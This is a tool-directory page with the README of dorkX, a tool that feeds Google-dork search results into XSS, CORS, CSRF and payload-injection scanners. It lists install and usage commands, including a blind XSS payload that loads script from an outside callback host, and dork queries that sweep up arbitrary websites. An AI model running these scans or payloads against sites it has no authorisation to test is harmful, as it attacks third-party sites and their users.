Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
dorkX — Pipe different tools with google dork Scanner | Kitploit
Tools/GitHubGitHub/ethicalhackingplayground/dorkx
ReconnaissanceVulnerability ScannersInformation GatheringWeb SecurityPenetration Testing
GitHubethicalhackingplayground/dorkx

dorkX

Pipe different tools with google dork Scanner

View Repository
57136 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

dorkX

Pipe different tools with google dork Scanner

Version 1.0

Image from Gyazo

Image from Gyazo

Install

zoid@MSI ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX

zoid@MSI ~/dorkX> cd dorkX

zoid@MSI ~/dorkX> go build dorkx.go

zoid@MSI ~/dorkX> go build corsx.go

zoid@MSI ~/dorkX> go build csrfx.go

zoid@MSI ~/dorkX> go build zin.go

Usage:

Blind XSS

zoid@MSI ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b '"><script src=https://z0id.xss.ht></script>'

Image from Gyazo

XSS

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | dalfox pipe

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | dalfox pipe

Cors

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./corsx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./corsx

CSRF

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./csrfx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./csrfx

Payload Injection

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./zin -pL <payloadList>

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" |./zin -p <payload>

If you get a bounty please support by buying me a coffee

Buy Me A Coffee

Download Tool